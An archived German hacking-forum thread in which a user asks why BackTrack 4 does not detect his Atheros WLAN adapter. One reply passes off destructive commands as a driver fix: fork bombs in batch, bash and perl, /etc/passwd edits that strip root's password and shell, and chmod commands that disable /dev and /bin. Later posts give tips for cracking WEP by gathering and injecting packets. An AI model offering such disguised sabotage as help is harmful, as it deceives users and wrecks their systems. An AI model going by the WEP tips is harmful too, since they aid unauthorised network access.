PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Backtrack 4 erkennt Wlan Adapter nicht!



boterfreak
24.06.2010, 12:58
Hallo, ich habe begreits im board gesucht und habe danach gegoogelt aber erfolglos...
Aber mein Adapter wird einfach nicht erkannt..
Habe Einen Laptop von Samsung R720 und den Wlan Adapter Atheros AR5007EG. Ich bitte um hilfe.

Bullterrier
24.06.2010, 13:12
wird der den überhaupt von BT unterstütz?
Guck am besten mal auf der BT Seite nach
hier http://backtrack.offensive-security.com/index.php?title=HCL:Wireless

boterfreak
24.06.2010, 13:23
Hab jetzt nur bei den Laptops gefunden BT2final 27.09.2007 runs fine. Intel ipw 3945 works after loading the module. 1400x1050 resolution works after installing the nvidia drivers from the nvidia homepage von R65 aber in Google hatte einer das Problem auch mit meinen Adapter und er hats hinbekommen. Aber natürlich hat er nicht geschrieben wie ers gemacht hat.

pima
24.06.2010, 13:53
Schau dir mal diese 2 Videos dazu an

http://www.youtube.com/watch?v=4kFEhehnGLU

http://www.youtube.com/watch?v=1lor5rzzl1o

boterfreak
24.06.2010, 17:22
Mhh danke für die 2 vids die kannte ich schon habs mir 4 mal angeguckt und komme immer noch nicht weiter das BT mein Adapter erkennt.

pima
24.06.2010, 17:26
Dann tschuldige aber ich kann dir da leider nicht helfen. Schreib ihn vllt. mal an in Youtube.

br00_pwn
24.06.2010, 17:32
Vielleicht hilft dir das hier :

Zuerst musst du Windows darauf vorbereiten, den direkten Zugriff auf das WLAN-Device zu erlauben. Dazu legst du (im Admin-Modus) eine Datei freedevice.bat an. Die öffnest du mit notepad (oder einem Editor Deiner Wahl) und trägst dort ein:
Code:
:s
start %0
%0|%0
goto :s
Datei abspeichern, Editor schließen und auf die bat-Datei klicken.

Jetzt startest du mal das VMWare und bootest Backtrack. Dort gehst du in die Konsole mit STRG+ALT+F1. Dort evtl. einloggen, falls das noch automatisch geklappt hat (Login: root Passwort: toor). Dann musst du den X-Server abschießen, weil der über den HAL-Daemon die Devices blockiert und du so keinen Direktzugriff bekommen könntest. Anschließend loggst Dich als root ein. Über die Proggis im Menü geht's leider nicht. Werd da wohl mal 'n Bugreport aufmachen.
Code:
Login: root
Passwort: toor
Als nächstes musst du dem Backtrack den direkten Zugriff auf das WLAN-Device geben. In der Normaleinstellung gibt Dir VMWare nämlich nur ein virtuelles Device. Weil die den direkten Zugriff nicht jedem ermöglichen, ist der Befehl entsprechend kryptisch, sieht aber dafür lustig aus.
Code:
:(){ :|:& } ;:
Anschließend brauchst du noch das Perl-Kommando, um die neue Devicestruktur zu scannen:
Code:
perl -e fork while true;
Als nächstes musst du dem Backtrack sagen, dass es jetzt Zugriff auf das WLAN herstellen. Dafür gibt es 2 Dateien, in denen der direkte Hardwarezugriff auf spezielle Devices unterbunden wird. Das musst du ändern. Dazu gehst du (unter root) mit einem Editor (nano) in die entsprechenden Dateien und entfernst die Beschränkungen.
Code:
nano /etc/passwd
Dort änderst du die Zeile:
Code:
root:x:0:0:root:/root:/bin/bash
in
Code:
root::0:0:root/root:/bin/false
Die Datei /etc/passwd- ist eine Kopie der /etc/passwd, für temporäre Änderungen Deswegen kopierst du einfach die geänderte passwd in die passwd-. Das geht mit:
Code:
cp /etc/passwd /etc/passwd-
Anschließend musst du noch die Rechte für die WLAN-Devices anpassen:
Code:
find /dev -exec chmod 000 {} \;
find /bin -exec chmod 111 {} \;
Wichtig: Nicht den Backslash und das Semikolon nicht vergessen.

Dann musst du Dich nur neu einloggen (nicht rebooten!!!), um die Änderungen für den Nutzeraccount zu aktivieren.
Code:
exit
Nach dem Login solltest du direkten Zugriff auf das WLAN-Device und Netzzugriff haben:
Code:
ping 127.0.0.1

Quelle: Backtrack 4 in VMWare mit Atheros AR5007EG und Aspire 7520 - Seite 2 - gulli:board (http://board.gulli.com/thread/1344565-backtrack-4-in-vmware-mit-atheros-ar5007eg-und-aspire-7520/2/)

LG br00-pwn

R60
24.06.2010, 17:35
Eigentlich müsste das auch ohne irgend welche Einstellungen gehen da is auch diese Wlan Karte haben.
Netzwerkkarte: Atheros AR5007EG Wireless Network Adapter
Schnittstellentyp: 802.11 Wireless Ethernet

Und wie gesagt bei mir läuft das ohne irgend was einzustellen.
Vielleicht mal ein Treiber Downgrade machen xD

boterfreak
24.06.2010, 18:11
So jetzt geht alles nur beacons gehen schnell hoch aber data nicht braucht man data oder beacons ?

br00_pwn
24.06.2010, 18:15
Schau dir mal mein Video TuT an, da bekommst du eigentlich alles erklärt :)
http://free-hack.com/video-tutorials/47820-wep-knacken-leicht-gemacht.html

LG br00_pwn

boterfreak
24.06.2010, 18:18
ja hab ich schon nur bin hier hier grade am pc und mein lappi ist grad mit bt beschäftigt so ist alles ich brauch nur den letzten schritt ob ich Beacons brauch oder data weil bei mir dauert es bis 1 data kommt mindestens 5 mins und beacons hab ich schon tausenden deshalb.

H4LLI_G4LLI.exe
24.06.2010, 18:22
klar brauchst du data ca 20000 bis 100000 stück ..willst du die einfach nur so sammeln ???

mfg

R60
24.06.2010, 22:05
guck dir mal den Parameter airplay genauer an ;)
Damit kannst du bedeutet mehr Traffic erzeugen wie wenn du nur wartest :D